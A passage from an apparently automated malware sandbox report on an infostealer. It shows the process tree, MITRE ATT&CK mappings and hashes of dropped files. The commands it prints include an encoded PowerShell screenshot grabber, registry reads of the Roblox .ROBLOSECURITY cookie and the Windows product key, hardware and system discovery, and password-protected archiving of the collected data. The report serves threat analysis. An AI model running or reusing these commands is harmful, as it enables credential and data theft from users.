bgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
PID:388

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nff0p010\nff0p010.cmdline"
5⤵
PID:5644

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4BAD.tmp" "c:\Users\Admin\AppData\Local\Temp\nff0p010\CSCA1BDD9723684106A31B67E881E0422A.TMP"
6⤵
PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3152

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5992

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3272

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5612

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:1640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:5460

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Yfvfv.zip" *"
3⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\_MEI43122\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI43122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Yfvfv.zip" *
4⤵
- Executes dropped EXE
PID:2852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:3204

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:5860

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:5124

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:1352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:4820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
PID:636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:1312

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:1200

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\  ‍ ‎‎‏‏‍\Common Files\Desktop\UpdateConfirm.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:220

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\ \Display (1).png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
PID:4236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:1076

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:436

C:\Windows\system32\dashost.exe
dashost.exe {5b2758e7-4b04-47fa-8150ca9c6bbc660e}
2⤵
PID:5760

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5740

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\ \Display (1).png"
2⤵
- Drops file in Windows directory
PID:4084

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \System\Task List.txt
1⤵
PID:5620

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \System\System Info.txt
1⤵
PID:1944

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \System\MAC Addresses.txt
1⤵
PID:2140

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Downloads.txt
1⤵
PID:3440

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Documents.txt
1⤵
PID:1160

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Desktop.txt
1⤵
PID:5688

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Videos.txt
1⤵
PID:2332

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Pictures.txt
1⤵
PID:1312

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ \Directories\Music.txt
1⤵
PID:3112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7z.dll
Filesize
1.8MB

MD5
2537a4ba91cb5ad22293b506ad873500

SHA1
ce3f4a90278206b33f037eaf664a5fbc39089ec4

SHA256
5529fdc4e6385ad95106a4e6da1d2792046a71c9d7452ee6cbc8012b4eb8f3f4

SHA512
7c02445d8a9c239d31f1c14933d75b3e731ed4c5f21a0ecf32d1395be0302e50aab5eb2df3057f3e9668f4b8ec0ccbed533cd54bc36ee1ada4cc5098cc0cfb14

Download Submit
C:\Program Files\7-Zip\7zFM.exe
Filesize
960KB

MD5
b161d842906239bf2f32ad158bea57f1

SHA1
4a125d6cbeae9658e862c637aba8f8b9f3bf5cf7

SHA256
3345c48505e0906f1352499ba7cbd439ac0c509a33f04c7d678e2c960c8b9f03

SHA512
0d14c75c8e80af8246ddf122052190f5ffb1f81ffd5b752990747b7efcb566b49842219d9b26df9dbe267c9a3876d7b60158c9f08d295d0926b60dbbebc1fa3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ae54e9db2e89f2c54da8cc0bfcbd26bd

SHA1
a88af6c673609ecbc51a1a60dfbc8577830d2b5d

SHA256
5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af

SHA512
e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4ae2b16fec57d3f97841d79ee469efd2

SHA1
9a92169a23200ca5fe3bd09f38fa9fcc386c66b4

SHA256
71b360814a137f3e7a779a299ab6c658e7124ea3d5d1eb279137d07c456df2a8

SHA512
5bebc878fb9164fd6fe1b863a3ccb42279e0332b36c8d50ea2081e45571a89effc1b1a7a8de14d6feb56213acf941d277f831cae9f7590a1e7439cedbea520a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
f9fa6b9af638f3b75cd3818688825f89

SHA1
667d7cf91b28a278e24c67694a94d35b28198d53

SHA256
d5d94937cb05e9f416ba5e2b30d8e02b807f8e13d18e653c5c8fe7d462afb37b

SHA512
b0c1f5b6e8ae1c3e114302bf2f292bfdefd14da3b1fa30e39613f718e7b7ae658c3bba1f6203f31f23ba92b57bc35b8b5831379305cb7044ae666545bcb238ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
f53207a5ca2ef5c7e976cbb3cb26d870

SHA1
49a8cc44f53da77bb3dfb36fc7676ed54675db43

SHA256
19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23

SHA512
be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\585d54bb-b0c0-4b95-abe7-b9ab561da810.tmp
Filesize
8KB

MD5
5dfc1a726415125dfa2c97f530961dd2

SHA1
cb6f61b47f732782f2ed2a909bd07a8f43c22478

SHA256
00dd00def04e6c2993c116d21816b218cbff2df2aaa34c4a6f892928c919d9ba

SHA512
c9a07fd319fd66b9395e67c3ad233855aa16f75a6ef5156d451d654946ef4b93f11385f852b96a5da1fb4bf1e591c6236fff2e840bcef625b359a16d299702f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
Filesize
67KB

MD5
d2d55f8057f8b03c94a81f3839b348b9

SHA1
37c399584539734ff679e3c66309498c8b2dd4d9

SHA256
6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c

SHA512
7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
Filesize
40KB

MD5
3c2ac6ed09323fe172784cdec7f3d671

SHA1
79eb656ac99f1a2efa7fbf8e8923f84dd2b63355

SHA256
67d42a456baa3edbec1eb21c94f294c04a72bac350acfae80f4f2b65afe8bc5f

SHA512
ac95a571afa882744a42447e84c1ca5231303ba33700f63e99d58860e9635ddc861745678d5c74b137af3d50daf05ea710abe65b11ffba95e2b2f6aaafb65071

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009
Filesize
1.2MB

MD5
047dbaf7429bd6fb2e31adc052b78641

SHA1
e6a965deb29062afffdd1778d12d49c51bd92910

SHA256
9057108a2b9a91d3b01e29aef1222826876f3922c704a3759ffa474b0b876132

SHA512
a4d0971c9ca2740336c02ef9e703010585ddbd977197d97f85a6e0f43d67ecb7af71db6e5b83a34c05c1e076124ff63da2cc3634108389fc55cab7026fdaacc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
Filesize
74KB

MD5
bc9faa8bb6aae687766b2db2e055a494

SHA1
34b2395d1b6908afcd60f92cdd8e7153939191e4

SHA256
4a725d21a3c98f0b9c5763b0a0796818d341579817af762448e1be522bc574ed

SHA512
621386935230595c3a00b9c53ea25daa78c2823d32085e22363dc438150f1cb6b3d50be5c58665886fac2286ae63bf1f62c8803cb38a0cac201c82ee2db975c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
Filesize
33KB

MD5
3cd0f2f60ab620c7be0c2c3dbf2cda97

SHA1
47fad82bfa9a32d578c0c84aed2840c55bd27bfb

SHA256
29a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b

SHA512
ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d
Filesize
24KB

MD5
1fc15b901524b92722f9ff863f892a2b

SHA1
cfd0a92d2c92614684524739630a35750c0103ec

SHA256
da9a1e371b04099955c3a322baee3aeee1962c8b8dabe559703a7c2699968ef4

SHA512
5cdc691e1be0d28c30819c0245b292d914f0a5beaed3f4fc42ac67ba22834808d66a0bfc663d625274631957c9b7760ada4088309b5941786c794edad1329c75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e
Filesize
206KB

MD5
f998b8f6765b4c57936ada0bb2eb4a5a

SHA1
13fb29dc0968838653b8414a125c124023c001df

SHA256
374db366966d7b48782f352c78a0b3670ffec33ed046d931415034d6f93dcfef

SHA512
d340ae61467332f99e4606ef022ff71c9495b9d138a40cc7c58b3206be0d080b25f4e877a811a55f4320db9a7f52e39f88f1aa426ba79fc5e78fc73dacf8c716

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032
Filesize
27KB

MD5
6b5c5bc3ac6e12eaa80c654e675f72df

SHA1
9e7124ce24650bc44dc734b5dc4356a245763845

SHA256
d1d3f1ebec67cc7dc38ae8a3d46a48f76f39755bf7d78eb1d5f20e0608c40b81

SHA512
66bd618ca40261040b17d36e6ad6611d8180984fd7120ccda0dfe26d18b786dbf018a93576ebafe00d3ce86d1476589c7af314d1d608b843e502cb481a561348

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
39a3eee3eb6c726debe1d36dd35d606b

SHA1
63b1c9c43db5c45170fa942e890941f30ec7d982

SHA256
319f7b890507f763ccf17dde07c405933d6e61cf0985b62be84f338352084f75

SHA512
1778e76cb30e2721faceabef9bf7a7db79820ba62f724ffebd30b4f12db73cb6234abf9d97f36a234ce69eb973085d73a4a0d84fb7e05e1fb20bf5b6164d7f79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
6fbd76720166ab7fcec2e66f4b1e1ace

SHA1
5ec84eb51368124803034525725e05a041e8dd52

SHA256
35e032eecd4264767bdec5de6d0053a384d98e674e4411aaf65fdb4b681660be

SHA512
98167f6f298333c196843db1130d6f6a68246c554f1c7dbf6c8a8ef35aaf9ca85330486326dfeaf58671377e2e1269649d606268e39b16822336243b18fb4c4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB

MD5
7ab2522c89457f1c0dbe3b8e6fc61e4d

SHA1
a6abaef7c777a663101fc68bbab56f8c823d4f32

SHA256
abd3d810f6592d0890e824b711cd85573b9e2e70d9f03cab4121ae18621147db

SHA512
d16f09b4ec8e131a7d604262c627a0801b39d3fff67dfa32dc5f37bafa265621357226133953d6e1190a058e0dfe991950f7e8a538a9ae27ebb298645e82ce09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
1fd5075cb57791d454f7345840fa64eb

SHA1
7bec68710f30a94bcb31fb49c4e0ba0dcd5563ce

SHA256
91961057afffa000c8d573b10a2d06392288a972fbffbc290eeb83e8c673b691

SHA512
8719137207c88b8e496f0cd27dee462ebe8471a554cbf54dd07e2d13c64245620a1d20f6743e9e2bca1c68807bf5a6d958d5458e031595763d3b6599b97e1165

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
4KB

MD5
e112fc4bd91a3d5e2f910a74c35eea3a

SHA1
1072f4d93e0a14b943d5b668ffd0a806f7b5bc8b

SHA256
d0c9e91a9860ccbb111e433da2850c493e5b72645f4a5c3cc1f39723d14a5e3d

SHA512
5a15b5894aabe9394a82d6c9ab8522ea287c6aaef394c0972f8c7bf6b8f3c627252f4f33a5e4746e9d8cda954e2dd4336068b746be2db61c1b04fff228862d7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
983B

MD5
4ac4909818fb6cf8020d5f65e52a12c5

SHA1
a3ad82a52819bfa631b528f70ed8b94d9d4e3a3d

SHA256
c3745990d22166701ac22fbba3e6531a6ba24088baab2812e4a81980df516f37

SHA512
bdb821aae9a60dc99a715292564f795b94d73f87ee18a8feda4580a797b634d4d37a067bf9456768a82ef72fd621b712df94d5c87f49855e45f04c12e77a2c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
616B

MD5
245980e5eaebc42dbade4b342c5a55e6

SHA1
b974947e27b9aeba786adbbc3fce8121617dc07b

SHA256
f4dda6b246ffe0e4a056433a073c5a7b7a47da0f022cd448d828026e9634f43a

SHA512
9995f7f5a2739b2fb7fbbd5899f4c9fe9f1e56881f445eca5282d98d474106daa5fdf3d64471aaac46c4bc95be1c253ab78e16cbe8bc89053099a30c2524a172

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
1bb2418dde2fefba65134f170dc34271

SHA1
27982ffad5f1e3400b8e33d6e77b5d11d56318af

SHA256
caec859d618301a67120e1322ab93791f8efe5ecead868489edf9a5b1261f0b7

SHA512
a0bfe12a72e00c0fceb3d039b2196afb738aa64c27431dbfb93490f1da0995c6e5a2c931b5e1e6fee9a6712a6a8254a832abb532621043d065d3292201fd210b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
c728f8b3fbfc94ca6113316ce3e2a9f1

SHA1
96641466f54cd90f2a0bbd9d353b06d86f1f1df9

SHA256
5a1b0e4f0f9eb875a52aaaa8c175884412dbea66676b63291ed0fb8a9502a0db

SHA512
